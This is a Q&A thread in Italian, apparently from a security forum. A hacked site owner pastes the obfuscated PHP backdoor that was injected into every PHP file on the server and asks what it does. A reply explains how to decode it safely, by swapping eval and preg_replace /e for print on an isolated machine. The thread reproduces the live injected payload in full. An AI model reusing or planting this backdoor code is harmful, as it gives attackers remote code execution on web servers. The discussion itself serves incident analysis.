Ho bisogno di aiuto per deoffuscare del PHP dannoso


Recentemente ho avuto un server di hosting condiviso che è stato violato; la seguente riga di codice è stata iniettata nella parte superiore di ogni file PHP sul server:

<?php if(!isset($GLOBALS["\x616\x756\x61"])) { $ua=strtolower($_SERVER["\x484\x540\x5f5\x535\x527\x417\x456\x54"]); if ((! strstr($ua,"\x6d3\x695")) and (! strstr($ua,"\x726\x3a\x31"))) $GLOBALS["\x616\x756\x61"]=1; } ?><?php $pyyhlxfwxr = '!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%x5c%x78%x5c%x78257UFH#%x5c%x7827rfs%x5c%x78256~6<%x5c%x787fw6<*K)ftpmdX%x7825)m%x5c%x7825):fmji%x5c%x7878:5%x5c%x7824-%x5c%x7824-!%x5c%x7825%x5c%x782)#]341]88M4P8]37]278]225]241]334]36vg}k~~9{d%x5c%x7825:osvufs:~928>>%x5c%x7822:ftmbg39*56A:>:8:60SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)323zbek!~!<b%860opjudovg)!gj!|!*msv%x5c%x787825j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x7825b:>!%x5c%x7825ww2)%x5c%x78251]y33]68]y34]68]y33]824)#P#-#Q#-#B#-#T#-#E#-{hA!osvufs!~<3,j%x5c%x7825>166%x61%154%x28%151%x6d%160%x6c%157%x64%145%x28%141%x72%1U,6<*27-SFGTOBSUOSVUFS,6<*x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x78255fdy>#]D4]273]D6P2L5%x5c%x7825fdy)##-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##QtpzpV%x5c%x787f%x5c%x787f%x5c%x787f%x5c%x787f<u%x5c%x7825 fjfgg($n){return chr(ord($n)-1);} @error_repo5)}.;%x5c%x7860UQPMSV25i%x5c%x785c2^<!Ce*[!%x5c%x7825cIjQeTQc5-#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-u%x5c%x7825!-#2#%x5c%x782f#y%x5c%x7825,3,j%x5c%x7825>jx5c%x7824y7%x5c%x7824-%x5c%x7824*<!%x5c%x7824-%x5c%x7824gps25)fnbozcYufhA%x5c%x78272qj%x5c%x78256<^#zsfvc%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]68]y76#<%x5c%x#M5]DgP5]D6#<%x5c%x7829%73", NULL); 
}6197g:74985-rr.93e:5597f-s.973:c%x785c}X%x5c%x7824<!%%x7825w6Z6<.2%x5c%x7860hA%x5c%x7827pd%x5c%x78256<C%x5c%x7827pd%x5x5c%x7825s:%x5c%x785c%x5c%x7825j:^<!%x5c%x7825w%x5c%x7860%xy>#]D6]281L1#%x5c%x782f%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x78%x7824]26%x5c%x7824-%x5c%x7824<%x5c%x7825j,,*!|%x5c%x7824-%x5x5c%x7860ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x782x5c%x787f!|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7865]y31]53]y6d]281]y43]78]y33]65]y31]55]y85]82]y76]62]y3:]84#-!OV78W~!Ypp2)%x5c%x7825zB%x5c%x7825z>!!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%yfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)euhA)3of25)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%x7822#)fepmq%x7825)ftpmdR6<*id%x5c%x7825)dfyfR%x5c%x7827tfsf5d816:+946:ce44#)zbssb!>!ss6~6<&w6<%x5c%x787fw6*CW&)7gj6<*doj%x5c%x78257-C)j%x5c%x7825!*3!%x5c%x7827!hmg%x5c%x7825!)!gj!<2,*j%x5c%x7825!-#1-tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x7860sfqmbdf)%5!|!*!***b%x5c%x7825)sf%x5c%msv%x5c%x78257-MSV,6<*)ujojR%x5c%x7827id%x5c323ldfid>}&;!osvufs}%x5c%x787f;!opjudo825tww!>!%x5c%x782400~:<h%x5c%x7825_t%x5c%x7825:osvc%x7825yy)#}#-#%x5c%x7824-%x5c%x7824%x5c%x7825!<**3-j%x5c%x7825-bubE{h%x5c%x7825)cnbs+yfeobz+sfwjidsb%xMM*<%x22%51%x29%51%x2H,2W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN}#|:7#6#)tutjyf%x5c%x7860439275ttfsqnr%x5c%x7878Bsfuvso!sGLOBALS["%x61%156%x75%156%x61"]=1; 
function%x782f7#@#7%x5c%x782f7^#iubq#%x5c%x785cq7825V<#65,47R25,d7R17,67R37,#%x5c%x782fq%x5c%x7825>Uc%x7824<!%x5c%x7825o:!>!%x5c%x78242178}527}88:}334}4%x5c%x7825t2w>#]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]2751<!fmtf!%x5c%x7825b:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:.2^,%xy7d]252]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%x7824]2M*<(<%x5c%x78e%x5c%x78b%x5c%x7825ggg!>!#]y81]273tfs%x5c%x7825w6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x5c34]342]58]24]31#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss%x5c%x785csboe))1r#%x5c%x785cq%x5c%x78257%x5cx5c%x7825tzw>!#]y76]277]y72]265]y39]274]y85]273]y6g]273]y76]271]y75c%x7827!hmg%x5c%x7825)!gj!|!*1?hmg%x5c%x782787f_*#[k2%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuo7825h!>!%x5c%x7825tdz)%x5c%x7825bbT-%x5c%x7825bT-%x5c%x7825hW~f%163%x74%141%x72%164"22)gj!|!*nbsbq%x5c%x7825x7827*&7-n%x5c%x7825)utjm6<%x5c%x787fw6*CW&)7gj6<*K)ftpmdXA6~6<u%x5c%!#0#)idubn%x5c%x7860hfsq)!sp!*#ojneb#-*f%x5c%x7825)sf%x5c3]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212]44fubmgoj{h1:|:*mmvo:>:iuhofm%x5c%x7825:-5fepmqnjA%x5c%x7827&6<.fmjjyf%x5c%x7860opjudovg%x5c%x7822)!gj}1~!<2p%x860FUPNFS&d_SFSFGFS%x5c%x7860QUUI&c_UOFHB%x5c%x78%x5c%x7825#%x5c%x782f#o]#%x5c%x782f*)323zbe!-#jt0*?]+^?]_%x5e{h+{d%x5c%x7825)+opjudovg+)!gj+A6|7**197-2qj%x5c%x782562%x61%171%x5f%155%x61%160%x28%42%x66%152%x66%147%x67%42%x2c%163%x74%1tussfw)%x5c%x7825zW%x5c%x7825h>Ez>%x5c%x782272qj%x5c%x7825)7gj6<**2r%x5c%x7825:|:**t%x5c%x7825)m%x5c%x7825=*h%x5cx5c%x7825)sutcvt)!gj!|!*bubE{h%x5-%x5c%x7825hOh%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x527u%x5c%x7825)7fmji%x5c%x78786<C%x5c%x7827&6<*rfs%x5c%x78257-K)fu5c%x7824tvctus)%x5c%x7825%x5c%x7824-%x5c%x7824b!>!%x5%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.4%x5cbnpe_GMFT%x5c%x7860QIQ&f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x7#zsfvr#%x5c%x785cq%x5c%x7825%x5c%x78256<*17-SFEBFI,6<*127-UVPFNJgj<*#k#)usbut%x5c%x7860cepn)%x5c%x7825bss-%x5c%x78w%x5c%x7860TW~%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%x7825mm)%x5c%x7825%x7825j:>1<%x5c%x7825j:=t53]Kc]55Ld]55#*<%x5c%x7825bG
9%x782f#@#%x5c%x782fqp%x5c%x7825>5h%x5c%x7825!<*::5c%x7825%x5c%x787f!~!<##!>!2p%x{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%x7825)!>>%x5c%x7822!ftmbg)!#>.%x5c%x7825!<***f%x5c%x7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%4-%x5c%x7824*!|!%x5c%x78245c%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!5c%x7825Z<#opo#>b%x5c%x7825!*##>>X)!gjZ<#opo#>78e%x5c%x78b%x5c%x7825w:!>!%x5c7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+99386c6f+9c%x7825cB%x5c%x7825iN}#-!tussfw)%x5c%x7825c*W%x5c%x7825eN)ufttj%x5c%x7822)gj6<^#Y#%x5c%x785cq5c%x7825t::!>!%x5c%x7824Ypp3)%x55c%x7825b:<!%x5c%x7825c:>%]28y]#%x5c%x782fr%x5c%x7825%x5c%xx78257>%x5c%x782f7&6|7**111127-K)ebfsX%x5c%x78c%x7825!-uyfu%x5c%x7825)3of)fepdof%x5c%x786057ftbc%x5c%x7825c:>1<%x5c%x7825b:>1<!gps)%x5cf+*0f(-!#]y76]277]y72]265]y39]271]y83]2}!+!<+{e%x5c%x7825+*!*+fepdfy]572]48y]#>m%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x7825)3of:opjudovg<~%x5825tzw%x5c%x782f%x5c%x7-bubE{h%x5c%x7825)sutcvt)fubmgoj~!dsfbuf%x5c%x7860gvodujpo)##-!#~<#%x5c%<##:>:h%x5c%x7825:<#64y]552]e7y]#>n%x5c%x7825<#372]58y]472]37y]]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#%x5c%x782f#7e:55946-t%x78256<%x5c%x787fw6*%x5c%x787f_*#ujojRk3%x5c%x7860{666~6<&w6<%x62%x5f%163%x70%154%x69%164%50%x2225)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%x5c%x7825%x5c%x7825%x5c%x7827jsv%x5c%x78256<C>^#zsfvr#%x5cD2P4]D6#<%x5c%x7825G]y6d]281Ld]245]K2]285]Ke]53Ld]%x78246767~6<Cw6<pd%x5c%x7825w6Z6<.5rting(0); 
preg_replace("%x2f%50%x2e%52%x29%57%x65","%x65%d]252]y74]256]y39]252]y83]273822l:!}V;3q%x5c%x7825}U;y]}R;2]},;osvufs}%x5c%x7827;mnui}&;zepcboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x78x7878pmpusut!-#j0#!%x5c%x782f!**#sfmc%x7824gvodujpo!%x5c%x7824-%}:}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdy<Cb*[%x5c%x%x7825-qp%x5c%x7825)54l}%x5c%x7827;%x5c%x7825!<*#}_;#)782fh%x5c%x7825)n%x5c%x7825-#+I#)q%x5c%x7825:>:%x7878pmpusut)tpqssutRe%x5c%x::::-111112)eobs%x5c%x7860un>qp%x5V%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{fpo#>>}R;msv}.;%x5c%x782f#%x5c%x782f#%x5c%x782f},;#-#}+;%x5c)%x5c%x7825j>1<%x5c%x7c%x7825)j{hnpd!opjudovg!|!**#j{hnpd#)tut]y7:]268]y7f#<!%x5c%x7%x5c%x7878:-!%x5c%x7<#16,47R57,27R66,#%x5c%x782fq%x5c%x7825>2q%xgps)%x5c%x7825j>1<%x5c%x7825j=6[%x5c%x7825wpef)#%x5c%x7824*<!%x5c%x7825kj:!>!#]y3d]#D#-#W#-#C#-#O#-#N#*%x5c%x7824%x5c%x782f%x5c%x7825kj:-!OVM75]y83]273]y76]277#<w6*%x5c%x787f_*#fmjgk4%x5c%x7860{6~6<5c%x782f#0#%x5c%x782f*#npd%x5c%x782f#)rrd%x5c%x782f#00;quui82f2986+7**^%x5c%x782f%x5c%x7825r%x5c%xc%x78256|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%25w6Z6<.3%x5c%x7860hA%x5*!%x5c%x7825z>3<!fmtf!%x5c%x7825z>2<]y76]258]y6g]273]y76]271]y7d]252]y74]256#<!%5c%x7824-%x5c%x7824]y8%x5c%x7824-%x5c7-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x7860LDPT7-UFOJ%x5c%x7860GB)fubf7860msvd},;uqpuft%x5c%x7860msvd}+;!>!}%x5c%x7827;!>>>x7827,*b%x5c%x7827)fepdof.)fepdof.%x5c%x785cq%x5c%x78257**^r.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]x5c%x7825%x5c%x787f!<X>b%xif((function_exists("%x6f%142%x5j{fpg)%x5c%x7825s:*<%x5c%x) && (!isset($GLOBALS["%x61%156%x75%156%x61"])))) { 
$x5c%x7825%x5c%x7824-%x5c%x7824y4%xsutcvt-#w#)ldbqov>*ofmy%x5c%x7825)utjm!|!*5!%xD!-id%x5c%x7825)uqpuft%x5c%x5)s%x5c%x7825>%x5c%x782fh%5c%x787fw6*CW&)7gj6<.[A%x5c%x7827&6<%x5c%x787fw6*%x5c%x5c%x7825<#g6R85,67R37c%x7825!|Z~!<##!>!2p%x5c%x78253]Kc#<%x5c%x7825tpz!>!#]D6M7]K3#<%x5c%x7825yb%x5c%x7825!**X)ufttj%x5c%x78)323ldfidk!~!<**qp%x5x5c%x7825)kV%x5c%x7878{**#k#)tutjyf%x5c%x7860%x5c%x7878%x5c%x7256]y81]265]y72]254]y76#<%x5c%x7825tmw!>!#]y84]2]y72]282#<!%x5c%x7825tjw!>!#]y84]275]y83]248]y83]qj%x5c%x7825)hopm3qjA)qj3hopmA%x5c%x78273qj%x5c%x78256<*Y%x5c%x785c%x7825Z<^2%x5c%x785c2b%x5c%x7825!>!2p%x5c%x7825!*3>?*2b%x5c%x78672]48y]#>s%x5c%x7825<#462]47y]252]18y]#>q%x5c%x7825<#762]67y]562]3851]y35]256]y76]72]y3d]51]y35]274]y4:]82]y3:]62]y4c#<!%x%x5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%x7%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%x5c%x7860ft%134%x78%62%x35%165%x3a%146%x21%76%x21%50%x5,18R#>q%x5c%x7825V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%7878<~!!%x5c%x7825s:N}#-%x5c%x7825o:W%8297f:5297e:56-%x5c%x7878r.985:52985-t.98]K45c%x7860bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!%x5c%x782fc%x7825tmw)%x5c%x7825tww**WYsbogA%x5c%x7827doj%x5c%x78256<%x5c%x787fufs:~:<*9-1-r%x5c%x782ppde:4:|:**#ppde#)tutjyf%x5c%x78604%x5c%x78223c%x7827pd%x5c%x78256<pd%x5c-%x5c%x7824%x5c%x785c%x5c%x7825j^%x5c%x7824-%xx5c%x7825:<**#57]38y]47]67y]37]88y]27#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-x5c%x782f7rfs%x5c%x78256<#o]1%x5c%x782f20QUUI7jsv}A;~!}%x5c%x787f;!|!}{;)g!*72!%x5c%x7827!hmg%x5c%5)!gj!<**2-4-bubE{h%x5c%x7825)sutcvt)esp>hmg%x5c%x7825!<12>j%x5c%x782556]y78]248]y83]256]y81]265]y72]254]y76]6P6]y6gP7L6M7]D4]275]D:M8]Df#<%x5c%x7825tdz>#L4]275L3]248L3P6L1M5]fuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%x7825}K;%Oc%x5c%x782f#00#W~!Ydrr)%x5c%x7825QwTW%x5c%x7825hIr%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^pdov{h19275j{hnpd19275!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofm5]43]321]464]284]364]6]27f!>>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%x7]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825j}l;33bq}k;opjudovg}%x5c%x7878;0]=])0#)U!%x5c
%x7827{**u%x5c%x78225r%x5c%x7878B%x5c%x7825h>#]y31]278]y3e]81]K78:56985:25%x5c%x785cSFWSFT%x5c%x7860%x5c%x7825}X;!sp!*#otmfV%x5c%x787f<*XAZASV<*w%x5c%x7825)ppde>u%x5c%xjs%x5c%x7878X6<#o]o]Y%x5c%x78257;utpI#7>%sbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fubfsdXk5%x5c%x7860{6825j=tj{fpg)%x5c%x7825%x5c%x7824-%x5c%x7824*<!x782f%x5c%x7825%x5c%x7824-%x5c%x7824!>!fyqm+#Qi%x5c%x785c1^W%x5c%x7825c!>!%x5c%x78>2bd%x5c%x7825!<5h%x5c%x7825%xsdXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x78257w2!>#p#%x5c%x782f#p#%x5c%x782f%x5c%x7825z<jg!)%x5c%x7825z>>28]322]3]364]6]283]427]36]373P6]36]73]8x5c%x7825ggg)(0)%x5c%x78272%x5c%x7824<!%x5c%x7825mm!>!#]y81]273]y76]258]y6g]273]y76]271]/(.*)/epreg_replaceofqxosjrru'; $peyjqdmyjs = explode(chr((183-139)),'7333,32,3252,22,7391,53,2462,43,792,46,5856,57,512,57,3749,48,3797,22,5642,33,8280,44,1091,54,4812,31,5820,36,4148,59,1382,42,6915,24,8658,27,1235,65,6863,52,3298,69,5085,46,4030,65,9611,41,8800,49,56,64,3726,23,7056,37,7093,54,9876,44,3852,34,7937,65,1046,45,2999,28,2505,40,5721,49,7238,21,4264,28,4958,36,8231,49,9652,66,1895,48,3516,25,8553,37,6728,37,2873,57,1820,47,4292,36,569,26,2105,44,5578,64,7578,55,3137,53,9073,53,1485,48,838,21,7524,28,7147,53,0,56,9297,63,343,30,5675,46,5379,32,485,27,1943,64,9360,38,8874,24,595,66,9235,38,960,27,2274,45,7478,46,3093,44,8898,70,1684,32,3932,33,6441,40,3541,44,4547,31,8002,65,1769,51,1716,53,9846,30,6765,59,4639,63,7200,38,4498,49,6290,34,7654,29,2077,28,6047,36,2319,22,8461,61,3367,57,6261,29,4843,58,1867,28,4207,57,3585,49,293,50,7307,26,4766,46,7728,29,3274,24,7757,21,5131,51,1533,52,9515,48,6360,59,6160,54,2149,38,233,60,2407,35,9213,22,3476,40,8612,46,5259,28,3694,32,4578,61,4328,24,738,54,6324,36,9563,48,2545,52,6523,44,7633,21,8324,55,7778,62,5942,63,8849,25,9398,64,899,61,3634,60,1213,22,3027,66,5913,29,7888,49,7840,48,6708,20,2649,63,6481,22,2187,51,8590,22,7552,26,8731,37,5052,33,6214,47,3886,46,120,35,5451,63,8067,68,5287,69,2597,52,10043,63,2773,52,155,43,4702,26,8685,46,4095,53,2238,36,2007,
70,7444,34,7019,37,1424,61,6083,28,987,59,6419,22,9718,46,5411,40,9764,43,6610,40,8135,55,4994,32,4901,57,9807,39,859,40,9126,34,2442,20,6005,42,1649,35,3819,33,2362,45,9160,53,3965,65,8522,31,4352,26,9462,53,1182,31,8417,44,5514,64,7259,48,7683,45,1359,23,1145,22,661,20,9008,65,5770,50,4469,29,6111,49,3190,62,681,57,198,35,9980,38,3424,52,9273,24,2930,69,8190,41,6824,39,8379,38,5182,38,4444,25,7365,26,373,43,2712,61,5026,26,1300,59,4728,38,6567,43,9920,60,6939,36,416,25,4378,66,6503,20,5356,23,461,24,8768,32,6650,58,2825,48,6975,44,10018,25,5220,39,8968,40,441,20,1585,64,2341,21,1167,15'); $rcwmfpxjbs=substr($pyyhlxfwxr,(63563-53457),(37-30)); if (!function_exists('djbxmtkyiw')) { function djbxmtkyiw($siiigmplqz, $jcodtyjdch) { $vqvamvvnqx = NULL; for($ttgvvqxcls=0;$ttgvvqxcls<(sizeof($siiigmplqz)/2);$ttgvvqxcls++) { $vqvamvvnqx .= substr($jcodtyjdch, $siiigmplqz[($ttgvvqxcls*2)],$siiigmplqz[($ttgvvqxcls*2)+1]); } return $vqvamvvnqx; };} $odgmnprvdj="\x20\x2a\x726\x6b0\x735\x6e3\x713\x20\x2f\x656\x614\x283\x742\x5f2\x650\x6c1\x635\x283\x682\x28\x32\x37\x32\x30\x29\x203\x682\x28\x33\x31\x32\x39\x29\x204\x6a2\x785\x743\x791\x77\x240\x651\x6a1\x645\x792\x73\x240\x791\x684\x786\x770\x72\x29\x3b\x2f\x204\x6f4\x711\x610\x786\x65\x2a\x20"; $pjegxnbdlt=substr($pyyhlxfwxr,(31614-21501),(70-58)); $pjegxnbdlt($rcwmfpxjbs, $odgmnprvdj, NULL); $pjegxnbdlt=$odgmnprvdj; $pjegxnbdlt=(391-270); $pyyhlxfwxr=$pjegxnbdlt-1; ?>

Ovviamente sto per scollegare il server e cercare di capire come è stato violato, ma mi piacerebbe capire cosa fa questo codice PHP. Quando visito le pagine violate e ne visualizzo il sorgente, nulla sembra fuori dall'ordinario; non sembra inserire nulla di visibile ai visitatori nelle pagine compromesse. I deoffuscatori online che ho provato non hanno funzionato con questo esempio, anche se il mio scanner antivirus lo rileva come una backdoor. Qualche idea?

    
posta tlng05 24.03.2015 - 03:57

1 risposta


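Un decodificatore esadecimale ripulisce le sequenze \x, il che aiuta, ma per decodificare il resto è necessario eseguirlo in PHP, perché è progettato per decodificare se stesso. Lo si può fare separando attentamente le istruzioni ed eseguendole una per una, facendo attenzione a non eseguire mai una eval o qualcosa di simile (sostituire 'eval' con 'print' per vedere qual è il codice del programma decodificato, quindi decidere se è sicuro eseguirlo). In questo campione la chiamata finale sembra essere una preg_replace con il modificatore /e, invocata tramite una variabile (le due sottostringhe compaiono in coda alla stringa lunga): esegue codice quanto una eval, quindi va sostituita con 'print' anche quella chiamata.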

Non è consigliabile farlo a meno che tu non abbia una certa conoscenza di PHP e una macchina sacrificabile, scollegata dalla rete, che puoi cancellare in seguito. Ed è un progetto abbastanza impegnativo, tanto che io non mi ci metterei; non devi fare tutto questo per sapere che è codice malevolo.

Se sei solo curioso, allora è diverso. Divertiti. Ma decodificarlo è un semplice esercizio di programmazione e potresti ottenere un aiuto migliore su altri siti Stack Exchange.

    
risposta data 24.03.2015 - 04:24
